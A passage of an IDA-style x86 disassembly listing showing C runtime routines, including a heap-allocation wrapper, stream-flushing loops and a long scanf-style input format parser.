push dword_4C5B64
call dword_4191B8 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_4107A8
loc_410786: ; CODE XREF: sub_410733+18�j
cmp dword_4C5988, 0
jz short loc_4107A8
push esi
call sub_412B9F
test eax, eax
pop ecx
jnz short loc_410746
jmp short loc_4107AA
; ---------------------------------------------------------------------------
loc_41079C: ; CODE XREF: sub_410733+3C�j
push ebx
push 0
push edi
call sub_40D7B0
add esp, 0Ch
loc_4107A8: ; CODE XREF: sub_410733+51�j
; sub_410733+5A�j
mov eax, edi
loc_4107AA: ; CODE XREF: sub_410733+67�j
pop edi
pop esi
pop ebx
retn
sub_410733 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DB61
loc_4107AE: ; CODE XREF: sub_40DB61+E�j
push esi
push edi
push 3
pop esi
xor edi, edi
cmp dword_4C6EE0, esi
jle short loc_410801
loc_4107BD: ; CODE XREF: sub_40DB61+2C9E�j
mov eax, dword_4C5ED4
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4107F8
test byte ptr [eax+0Ch], 83h
jz short loc_4107DC
push eax
call sub_40E8F7
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4107DC
inc edi
loc_4107DC: ; CODE XREF: sub_40DB61+2C6C�j
; sub_40DB61+2C78�j
cmp esi, 14h
jl short loc_4107F8
mov eax, dword_4C5ED4
push dword ptr [eax+esi*4]
call sub_40E359
mov eax, dword_4C5ED4
and dword ptr [eax+esi*4], 0
pop ecx
loc_4107F8: ; CODE XREF: sub_40DB61+2C66�j
; sub_40DB61+2C7E�j
inc esi
cmp esi, dword_4C6EE0
jl short loc_4107BD
loc_410801: ; CODE XREF: sub_40DB61+2C5A�j
mov eax, edi
pop edi
pop esi
retn
; END OF FUNCTION CHUNK FOR sub_40DB61
; =============== S U B R O U T I N E =======================================
sub_410806 proc near ; CODE XREF: sub_40E8F7+1A�p
; sub_40EC73+7D�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_410855
test ax, 108h
jz short loc_410855
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_410854
push edi
push eax
push dword ptr [esi+10h]
call sub_41330B
add esp, 0Ch
cmp eax, edi
jnz short loc_41084D
mov eax, [esi+0Ch]
test al, al
jns short loc_410854
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_410854
; ---------------------------------------------------------------------------
loc_41084D: ; CODE XREF: sub_410806+36�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_410854: ; CODE XREF: sub_410806+25�j
; sub_410806+3D�j ...
pop edi
loc_410855: ; CODE XREF: sub_410806+13�j
; sub_410806+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_410806 endp
; =============== S U B R O U T I N E =======================================
sub_410863 proc near ; CODE XREF: sub_41089E+2D�p
; sub_41089E+48�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_410875
push esi
call sub_41089E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_410875: ; CODE XREF: sub_410863+7�j
push esi
call sub_410806
test eax, eax
pop ecx
jz short loc_410885
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_410885: ; CODE XREF: sub_410863+1B�j
test byte ptr [esi+0Dh], 40h
jz short loc_41089A
push dword ptr [esi+10h]
call sub_414D0D
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41089A: ; CODE XREF: sub_410863+26�j
xor eax, eax
pop esi
retn
sub_410863 endp
; =============== S U B R O U T I N E =======================================
sub_41089E proc near ; CODE XREF: sub_410863+A�p
; sub_41090B+2�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
xor esi, esi
xor ebx, ebx
xor edi, edi
cmp dword_4C6EE0, esi
jle short loc_4108FC
loc_4108AF: ; CODE XREF: sub_41089E+5C�j
mov eax, dword_4C5ED4
mov eax, [eax+esi*4]
test eax, eax
jz short loc_4108F3
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_4108F3
cmp [esp+0Ch+arg_0], 1
jnz short loc_4108D9
push eax
call sub_410863
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4108F3
inc ebx
jmp short loc_4108F3
; ---------------------------------------------------------------------------
loc_4108D9: ; CODE XREF: sub_41089E+2A�j
cmp [esp+0Ch+arg_0], 0
jnz short loc_4108F3
test cl, 2
jz short loc_4108F3
push eax
call sub_410863
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4108F3
or edi, eax
loc_4108F3: ; CODE XREF: sub_41089E+1B�j
; sub_41089E+23�j ...
inc esi
cmp esi, dword_4C6EE0
jl short loc_4108AF
loc_4108FC: ; CODE XREF: sub_41089E+F�j
cmp [esp+0Ch+arg_0], 1
mov eax, ebx
jz short loc_410907
mov eax, edi
loc_410907: ; CODE XREF: sub_41089E+65�j
pop edi
pop esi
pop ebx
retn
sub_41089E endp
; =============== S U B R O U T I N E =======================================
sub_41090B proc near ; CODE XREF: sub_40DB61�p
push 1
call sub_41089E
pop ecx
retn
sub_41090B endp
; =============== S U B R O U T I N E =======================================
sub_410914 proc near ; CODE XREF: sub_41095C+921�p
; sub_41095C+A26�p
cmp dword_4214F4, 1
push esi
mov esi, eax
jle short loc_41092C
push 4
push esi
call sub_41328D
pop ecx
pop ecx
jmp short loc_410938
; ---------------------------------------------------------------------------
loc_41092C: ; CODE XREF: sub_410914+A�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+esi*2]
and eax, 4
loc_410938: ; CODE XREF: sub_410914+16�j
test eax, eax
jnz short loc_410942
and esi, 0FFFFFFDFh
sub esi, 7
loc_410942: ; CODE XREF: sub_410914+26�j
mov eax, esi
pop esi
retn
sub_410914 endp
; =============== S U B R O U T I N E =======================================
sub_410946 proc near ; CODE XREF: sub_41095C+6F�p
; sub_41095C+221�p ...
dec dword ptr [edx+4]
js short loc_410954
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_410954: ; CODE XREF: sub_410946+3�j
push edx
call sub_40D9DD
pop ecx
retn
sub_410946 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41095C proc near ; CODE XREF: sub_40DCA4+2A�p
var_1D8 = word ptr -1D8h
var_1D4 = byte ptr -1D4h
var_1D3 = byte ptr -1D3h
var_1D0 = dword ptr -1D0h
var_1CC = dword ptr -1CCh
var_1C8 = byte ptr -1C8h
var_1C7 = byte ptr -1C7h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_4F = byte ptr -4Fh
var_4E = byte ptr -4Eh
var_4D = byte ptr -4Dh
var_4C = byte ptr -4Ch
var_4B = byte ptr -4Bh
var_4A = byte ptr -4Ah
var_49 = byte ptr -49h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_39 = byte ptr -39h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1C8h
push offset stru_41BC40
call __SEH_prolog
mov eax, dword_421360
xor eax, [ebp+4]
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_20], eax
mov [ebp+var_24], eax
mov [ebp+var_28], eax
and [ebp+var_29], al
mov [ebp+var_30], eax
mov [ebp+var_34], eax
loc_41098A: ; CODE XREF: sub_41095C+A5�j
; sub_41095C+B59�j
mov esi, [ebp+arg_4]
loc_41098D: ; CODE XREF: sub_41095C+B47�j
mov al, [esi]
test al, al
jz loc_4114BB
movzx eax, al
cmp dword_4214F4, 1
jle short loc_4109AF
push 8
push eax
call sub_41328D
pop ecx
pop ecx
jmp short loc_4109BC
; ---------------------------------------------------------------------------
loc_4109AF: ; CODE XREF: sub_41095C+45�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, 8
loc_4109BC: ; CODE XREF: sub_41095C+51�j
xor edi, edi
cmp eax, edi
jz short loc_410A03
dec [ebp+var_30]
loc_4109C5: ; CODE XREF: sub_41095C+7F�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov esi, eax
push esi
call sub_414DD0
pop ecx
test eax, eax
jnz short loc_4109C5
cmp esi, 0FFFFFFFFh
jz short loc_4109ED
push [ebp+arg_0]
push esi
call sub_414D64
pop ecx
pop ecx
loc_4109ED: ; CODE XREF: sub_41095C+84�j
; sub_41095C+A3�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_414DD0
pop ecx
test eax, eax
jnz short loc_4109ED
jmp short loc_41098A
; ---------------------------------------------------------------------------
loc_410A03: ; CODE XREF: sub_41095C+64�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_411437
mov [ebp+var_38], edi
and [ebp+var_39], 0
mov [ebp+var_40], edi
mov [ebp+var_44], edi
mov [ebp+var_48], edi
and [ebp+var_49], 0
and [ebp+var_4A], 0
and [ebp+var_4B], 0
and [ebp+var_4C], 0
and [ebp+var_4D], 0
and [ebp+var_4E], 0
mov [ebp+var_4F], 1
mov [ebp+var_54], edi
loc_410A3E: ; CODE XREF: sub_41095C+1BC�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
cmp dword_4214F4, 1
jle short loc_410A5A
push 4
push eax
call sub_41328D
pop ecx
pop ecx
jmp short loc_410A67
; ---------------------------------------------------------------------------
loc_410A5A: ; CODE XREF: sub_41095C+F0�j
mov ecx, off_4214EC
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_410A67: ; CODE XREF: sub_41095C+FC�j
test eax, eax
jz short loc_410A7A
inc [ebp+var_44]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_410B14
; ---------------------------------------------------------------------------
loc_410A7A: ; CODE XREF: sub_41095C+10D�j
cmp ebx, 4Eh
jg short loc_410AF2
jz loc_410B14
cmp ebx, 2Ah
jz short loc_410AED
cmp ebx, 46h
jz loc_410B14
cmp ebx, 49h
jz short loc_410AA2
cmp ebx, 4Ch
jnz short loc_410B01
inc [ebp+var_4F]
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410AA2: ; CODE XREF: sub_41095C+13A�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_410AC1
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_410AC1
mov esi, eax
inc [ebp+var_54]
and [ebp+var_5C], 0
and [ebp+var_58], 0
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410AC1: ; CODE XREF: sub_41095C+14C�j
; sub_41095C+154�j
cmp cl, 33h
jnz short loc_410AD2
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_410AD2
mov esi, eax
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410AD2: ; CODE XREF: sub_41095C+168�j
; sub_41095C+170�j
cmp cl, 64h
jz short loc_410B14
cmp cl, 69h
jz short loc_410B14
cmp cl, 6Fh
jz short loc_410B14
cmp cl, 78h
jz short loc_410B14
cmp cl, 58h
jnz short loc_410B01
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410AED: ; CODE XREF: sub_41095C+12C�j
inc [ebp+var_4B]
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410AF2: ; CODE XREF: sub_41095C+121�j
cmp ebx, 68h
jz short loc_410B0E
cmp ebx, 6Ch
jz short loc_410B06
cmp ebx, 77h
jz short loc_410B09
loc_410B01: ; CODE XREF: sub_41095C+13F�j
; sub_41095C+18D�j
inc [ebp+var_4C]
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410B06: ; CODE XREF: sub_41095C+19E�j
inc [ebp+var_4F]
loc_410B09: ; CODE XREF: sub_41095C+1A3�j
inc [ebp+var_4E]
jmp short loc_410B14
; ---------------------------------------------------------------------------
loc_410B0E: ; CODE XREF: sub_41095C+199�j
dec [ebp+var_4F]
dec [ebp+var_4E]
loc_410B14: ; CODE XREF: sub_41095C+119�j
; sub_41095C+123�j ...
cmp [ebp+var_4C], 0
jz loc_410A3E
mov [ebp+var_48], edi
mov [ebp+arg_4], esi
cmp [ebp+var_4B], 0
jnz short loc_410B3E
mov eax, [ebp+arg_8]
mov [ebp+var_60], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_64], ebx
jmp short loc_410B41
; ---------------------------------------------------------------------------
loc_410B3E: ; CODE XREF: sub_41095C+1CC�j
mov ebx, [ebp+var_64]
loc_410B41: ; CODE XREF: sub_41095C+1E0�j
and [ebp+var_4C], 0
cmp [ebp+var_4E], 0
jnz short loc_410B5F
mov al, [esi]
cmp al, 53h
jz short loc_410B5B
cmp al, 43h
jz short loc_410B5B
or [ebp+var_4E], 0FFh
jmp short loc_410B5F
; ---------------------------------------------------------------------------
loc_410B5B: ; CODE XREF: sub_41095C+1F3�j
; sub_41095C+1F7�j
mov [ebp+var_4E], 1
loc_410B5F: ; CODE XREF: sub_41095C+1ED�j
; sub_41095C+1FD�j
movzx edi, byte ptr [esi]
or edi, 20h
mov [ebp+var_68], edi
cmp edi, 6Eh
jz short loc_410BA5
cmp edi, 63h
jz short loc_410B97
cmp edi, 7Bh
jz short loc_410B97
loc_410B77: ; CODE XREF: sub_41095C+231�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov esi, eax
push esi
call sub_414DD0
pop ecx
test eax, eax
jnz short loc_410B77
mov [ebp+var_28], esi
mov esi, [ebp+arg_4]
jmp short loc_410BA5
; ---------------------------------------------------------------------------
loc_410B97: ; CODE XREF: sub_41095C+214�j
; sub_41095C+219�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov [ebp+var_28], eax
loc_410BA5: ; CODE XREF: sub_41095C+20F�j
; sub_41095C+239�j
mov ecx, [ebp+var_44]
test ecx, ecx
jz short loc_410BB6
cmp [ebp+var_48], 0
jz loc_410E4E
loc_410BB6: ; CODE XREF: sub_41095C+24E�j
cmp edi, 6Fh
jg loc_410E20
jz loc_411195
cmp edi, 63h
jz loc_410DFF
cmp edi, 64h
jz loc_411195
jle loc_410E46
cmp edi, 67h
jle short loc_410C1A
cmp edi, 69h
jz short loc_410C02
cmp edi, 6Eh
jnz loc_410E46
mov eax, [ebp+var_30]
cmp [ebp+var_4B], 0
jz loc_41140C
jmp loc_41142C
; ---------------------------------------------------------------------------
loc_410C02: ; CODE XREF: sub_41095C+289�j
push 64h
pop edi
loc_410C05: ; CODE XREF: sub_41095C+4DF�j
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz loc_411089
mov [ebp+var_4A], 1
jmp loc_41108E
; ---------------------------------------------------------------------------
loc_410C1A: ; CODE XREF: sub_41095C+284�j
lea esi, [ebp+var_1C8]
mov ebx, [ebp+var_28]
cmp ebx, 2Dh
jnz short loc_410C36
mov [ebp+var_1C8], bl
lea esi, [ebp+var_1C7]
jmp short loc_410C3B
; ---------------------------------------------------------------------------
loc_410C36: ; CODE XREF: sub_41095C+2CA�j
cmp ebx, 2Bh
jnz short loc_410C52
loc_410C3B: ; CODE XREF: sub_41095C+2D8�j
dec [ebp+var_48]
inc [ebp+var_30]
mov edi, [ebp+arg_0]
mov edx, edi
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_410C55
; ---------------------------------------------------------------------------
loc_410C52: ; CODE XREF: sub_41095C+2DD�j
mov edi, [ebp+arg_0]
loc_410C55: ; CODE XREF: sub_41095C+2F4�j
cmp [ebp+var_44], 0
jz short loc_410C64
cmp [ebp+var_48], 15Dh
jle short loc_410C6B
loc_410C64: ; CODE XREF: sub_41095C+2FD�j
mov [ebp+var_48], 15Dh
loc_410C6B: ; CODE XREF: sub_41095C+306�j
; sub_41095C+353�j
cmp dword_4214F4, 1
jle short loc_410C80
push 4
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_410C8C
; ---------------------------------------------------------------------------
loc_410C80: ; CODE XREF: sub_41095C+316�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_410C8C: ; CODE XREF: sub_41095C+322�j
test eax, eax
jz short loc_410CB1
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_410CB1
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
jmp short loc_410C6B
; ---------------------------------------------------------------------------
loc_410CB1: ; CODE XREF: sub_41095C+332�j
; sub_41095C+33C�j
cmp byte_4214F8, bl
jnz short loc_410D1D
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_410D1D
inc [ebp+var_30]
mov edx, edi
call sub_410946
mov ebx, eax
mov al, byte_4214F8
mov [esi], al
inc esi
loc_410CD7: ; CODE XREF: sub_41095C+3BF�j
mov [ebp+var_28], ebx
cmp dword_4214F4, 1
jle short loc_410CEF
push 4
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_410CFB
; ---------------------------------------------------------------------------
loc_410CEF: ; CODE XREF: sub_41095C+385�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_410CFB: ; CODE XREF: sub_41095C+391�j
test eax, eax
jz short loc_410D1D
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_410D1D
inc [ebp+var_40]
mov [esi], bl
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_410946
mov ebx, eax
jmp short loc_410CD7
; ---------------------------------------------------------------------------
loc_410D1D: ; CODE XREF: sub_41095C+35B�j
; sub_41095C+365�j ...
cmp [ebp+var_40], 0
jz loc_410DB6
cmp ebx, 65h
jz short loc_410D35
cmp ebx, 45h
jnz loc_410DB6
loc_410D35: ; CODE XREF: sub_41095C+3CE�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_410DB6
mov byte ptr [esi], 65h
inc esi
inc [ebp+var_30]
mov edx, edi
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
cmp ebx, 2Dh
jnz short loc_410D5C
mov [esi], al
inc esi
jmp short loc_410D61
; ---------------------------------------------------------------------------
loc_410D5C: ; CODE XREF: sub_41095C+3F9�j
cmp ebx, 2Bh
jnz short loc_410D7F
loc_410D61: ; CODE XREF: sub_41095C+3FE�j
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jnz short loc_410D70
and [ebp+var_48], eax
jmp short loc_410D7F
; ---------------------------------------------------------------------------
loc_410D70: ; CODE XREF: sub_41095C+40D�j
; sub_41095C+458�j
mov edx, edi
inc [ebp+var_30]
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
loc_410D7F: ; CODE XREF: sub_41095C+403�j
; sub_41095C+412�j
cmp dword_4214F4, 1
jle short loc_410D94
push 4
push ebx
call sub_41328D
pop ecx
pop ecx
jmp short loc_410DA0
; ---------------------------------------------------------------------------
loc_410D94: ; CODE XREF: sub_41095C+42A�j
mov eax, off_4214EC
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_410DA0: ; CODE XREF: sub_41095C+436�j
test eax, eax
jz short loc_410DB6
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz short loc_410DB6
inc [ebp+var_40]
mov [esi], bl
inc esi
jmp short loc_410D70
; ---------------------------------------------------------------------------
loc_410DB6: ; CODE XREF: sub_41095C+3C5�j
; sub_41095C+3D3�j ...
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_410DC7
push edi
push ebx
call sub_414D64
pop ecx
pop ecx
loc_410DC7: ; CODE XREF: sub_41095C+460�j
cmp [ebp+var_40], 0
jz loc_4114BB
cmp [ebp+var_4B], 0
jnz loc_41142C
inc [ebp+var_34]
and byte ptr [esi], 0
lea eax, [ebp+var_1C8]
push eax
push [ebp+var_64]
movsx eax, [ebp+var_4F]
dec eax
push eax
call off_42136C
add esp, 0Ch
jmp loc_41142C
; ---------------------------------------------------------------------------
loc_410DFF: ; CODE XREF: sub_41095C+26C�j
test ecx, ecx
jnz short loc_410E0D
mov [ebp+var_44], 1
inc [ebp+var_48]
loc_410E0D: ; CODE XREF: sub_41095C+4A5�j
; sub_41095C+4D2�j
cmp [ebp+var_4E], 0
jle loc_410F95
mov [ebp+var_4D], 1
jmp loc_410F95
; ---------------------------------------------------------------------------
loc_410E20: ; CODE XREF: sub_41095C+25D�j
mov eax, edi
sub eax, 70h
jz loc_411191
sub eax, 3
jz short loc_410E0D
dec eax
dec eax
jz loc_411195
sub eax, 3
jz loc_410C05
sub eax, 3
jz short loc_410E6F
loc_410E46: ; CODE XREF: sub_41095C+27B�j
; sub_41095C+28E�j
movzx eax, byte ptr [esi]
cmp eax, [ebp+var_28]
jz short loc_410E57
loc_410E4E: ; CODE XREF: sub_41095C+254�j
cmp [ebp+var_28], 0FFFFFFFFh
jmp loc_41148B
; ---------------------------------------------------------------------------
loc_410E57: ; CODE XREF: sub_41095C+4F0�j
dec [ebp+var_29]
cmp [ebp+var_4B], 0
jnz loc_41142C
mov eax, [ebp+var_60]
mov [ebp+arg_8], eax
jmp loc_41142C
; ---------------------------------------------------------------------------
loc_410E6F: ; CODE XREF: sub_41095C+4E8�j
cmp [ebp+var_4E], 0
jle short loc_410E79
mov [ebp+var_4D], 1
loc_410E79: ; CODE XREF: sub_41095C+517�j
mov edi, [ebp+arg_4]
inc edi
mov [ebp+arg_4], edi
mov [ebp+var_1CC], edi
cmp byte ptr [edi], 5Eh
jnz short loc_410E96
inc edi
mov [ebp+var_1CC], edi
or [ebp+var_49], 0FFh
loc_410E96: ; CODE XREF: sub_41095C+52D�j
mov ebx, [ebp+var_20]
test ebx, ebx
jnz short loc_410EEE
and [ebp+ms_exc.disabled], ebx
push 20h
pop eax
call sub_40D9A0
mov [ebp+ms_exc.old_esp], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_410EEE
; ---------------------------------------------------------------------------
loc_410EB6: ; DATA XREF: .text:stru_41BC40�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_410EBA: ; DATA XREF: .text:stru_41BC40�o
mov esp, [ebp+ms_exc.old_esp]
call sub_414EC1
push 20h
call sub_40E74F
pop ecx
mov [ebp+var_20], eax
test eax, eax
jnz short loc_410EDA
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp loc_4114BB
; ---------------------------------------------------------------------------
loc_410EDA: ; CODE XREF: sub_41095C+573�j
mov [ebp+var_24], 1
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1CC]
mov ebx, [ebp+var_20]
loc_410EEE: ; CODE XREF: sub_41095C+53F�j
; sub_41095C+558�j
push 20h
push 0
push ebx
call sub_40D7B0
add esp, 0Ch
cmp [ebp+var_68], 7Bh
jnz short loc_410F75
cmp byte ptr [edi], 5Dh
jnz short loc_410F75
mov dl, 5Dh
inc edi
mov byte ptr [ebx+0Bh], 20h
jmp short loc_410F78
; ---------------------------------------------------------------------------
loc_410F0F: ; CODE XREF: sub_41095C+620�j
inc edi
cmp al, 2Dh
jnz short loc_410F5F
test dl, dl
jz short loc_410F5F
mov cl, [edi]
cmp cl, 5Dh
jz short loc_410F5F
inc edi
cmp dl, cl
jnb short loc_410F28
mov al, cl
jmp short loc_410F2C
; ---------------------------------------------------------------------------
loc_410F28: ; CODE XREF: sub_41095C+5C6�j
mov al, dl
mov dl, cl
loc_410F2C: ; CODE XREF: sub_41095C+5CA�j
cmp dl, al
ja short loc_410F5B
movzx esi, dl
sub al, dl
inc al
movzx eax, al
mov [ebp+var_1D0], eax
loc_410F40: ; CODE XREF: sub_41095C+5FD�j
mov eax, esi
shr eax, 3
add eax, ebx
mov ecx, esi
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
inc esi
dec [ebp+var_1D0]
jnz short loc_410F40
loc_410F5B: ; CODE XREF: sub_41095C+5D2�j
xor dl, dl
jmp short loc_410F78
; ---------------------------------------------------------------------------
loc_410F5F: ; CODE XREF: sub_41095C+5B6�j
; sub_41095C+5BA�j ...
mov [ebp+var_39], al
movzx ecx, al
mov eax, ecx
shr eax, 3
add eax, ebx
and ecx, 7
mov dl, 1
shl dl, cl
or [eax], dl
loc_410F75: ; CODE XREF: sub_41095C+5A3�j
; sub_41095C+5A8�j
mov dl, [ebp+var_39]
loc_410F78: ; CODE XREF: sub_41095C+5B1�j
; sub_41095C+601�j
mov al, [edi]
cmp al, 5Dh
jnz short loc_410F0F
test al, al
jz loc_4114BB
mov ebx, [ebp+var_64]
cmp [ebp+var_68], 7Bh
jnz short loc_410F92
mov [ebp+arg_4], edi
loc_410F92: ; CODE XREF: sub_41095C+631�j
mov edi, [ebp+var_68]
loc_410F95: ; CODE XREF: sub_41095C+4B5�j
; sub_41095C+4BF�j
mov esi, ebx
dec [ebp+var_30]
cmp [ebp+var_28], 0FFFFFFFFh
jz short loc_410FAD
push [ebp+arg_0]
push [ebp+var_28]
call sub_414D64
pop ecx
pop ecx
loc_410FAD: ; CODE XREF: sub_41095C+642�j
; sub_41095C+7DE�j ...
cmp [ebp+var_44], 0
jz short loc_410FC1
mov eax, [ebp+var_48]
dec [ebp+var_48]
test eax, eax
jz loc_411158
loc_410FC1: ; CODE XREF: sub_41095C+655�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov [ebp+var_28], eax
cmp eax, 0FFFFFFFFh
jz loc_411145
cmp edi, 63h
jz short loc_411021
cmp edi, 73h
jnz short loc_410FF1
cmp eax, 9
jl short loc_410FEC
cmp eax, 0Dh
jle short loc_410FF1
loc_410FEC: ; CODE XREF: sub_41095C+689�j
cmp eax, 20h
jnz short loc_411021
loc_410FF1: ; CODE XREF: sub_41095C+684�j
; sub_41095C+68E�j
cmp edi, 7Bh
jnz loc_411145
mov ecx, eax
and ecx, 7
xor edx, edx
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
mov edi, [ebp+var_20]
movsx ecx, byte ptr [ecx+edi]
movsx edi, [ebp+var_49]
xor ecx, edi
test edx, ecx
jz loc_411145
mov edi, [ebp+var_68]
loc_411021: ; CODE XREF: sub_41095C+67F�j
; sub_41095C+693�j
cmp [ebp+var_4B], 0
jnz loc_41113F
cmp [ebp+var_4D], 0
jz loc_411134
mov [ebp+var_1D4], al
movzx eax, al
mov ecx, off_4214EC
test byte ptr [ecx+eax*2+1], 80h
jz short loc_41105C
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov [ebp+var_1D3], al
loc_41105C: ; CODE XREF: sub_41095C+6ED�j
push dword_4214F4
lea eax, [ebp+var_1D4]
push eax
lea eax, [ebp+var_1D8]
push eax
call sub_414DF9
add esp, 0Ch
mov ax, [ebp+var_1D8]
mov [ebx], ax
inc ebx
inc ebx
jmp loc_411137
; ---------------------------------------------------------------------------
loc_411089: ; CODE XREF: sub_41095C+2AF�j
cmp ebx, 2Bh
jnz short loc_4110AD
loc_41108E: ; CODE XREF: sub_41095C+2B9�j
dec [ebp+var_48]
jnz short loc_41109D
test ecx, ecx
jz short loc_41109D
mov [ebp+var_4C], 1
jmp short loc_4110AD
; ---------------------------------------------------------------------------
loc_41109D: ; CODE XREF: sub_41095C+735�j
; sub_41095C+739�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
loc_4110AD: ; CODE XREF: sub_41095C+730�j
; sub_41095C+73F�j
cmp ebx, 30h
jnz loc_4111C7
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
cmp bl, 78h
jz short loc_41110D
cmp bl, 58h
jz short loc_41110D
mov [ebp+var_40], 1
cmp edi, 78h
jz short loc_4110F2
cmp [ebp+var_44], 0
jz short loc_4110EA
dec [ebp+var_48]
jnz short loc_4110EA
inc [ebp+var_4C]
loc_4110EA: ; CODE XREF: sub_41095C+784�j
; sub_41095C+789�j
push 6Fh
loc_4110EC: ; CODE XREF: sub_41095C+7D6�j
pop edi
jmp loc_4111C7
; ---------------------------------------------------------------------------
loc_4110F2: ; CODE XREF: sub_41095C+77E�j
dec [ebp+var_30]
cmp ebx, 0FFFFFFFFh
jz short loc_411105
push [ebp+arg_0]
push ebx
call sub_414D64
pop ecx
pop ecx
loc_411105: ; CODE XREF: sub_41095C+79C�j
push 30h
pop ebx
jmp loc_4111C4
; ---------------------------------------------------------------------------
loc_41110D: ; CODE XREF: sub_41095C+76D�j
; sub_41095C+772�j
inc [ebp+var_30]
mov edx, [ebp+arg_0]
call sub_410946
mov ebx, eax
mov [ebp+var_28], ebx
cmp [ebp+var_44], 0
jz short loc_411130
sub [ebp+var_48], 2
cmp [ebp+var_48], 1
jge short loc_411130
inc [ebp+var_4C]
loc_411130: ; CODE XREF: sub_41095C+7C5�j
; sub_41095C+7CF�j
push 78h
jmp short loc_4110EC
; ---------------------------------------------------------------------------
loc_411134: ; CODE XREF: sub_41095C+6D3�j
mov [ebx], al
inc ebx
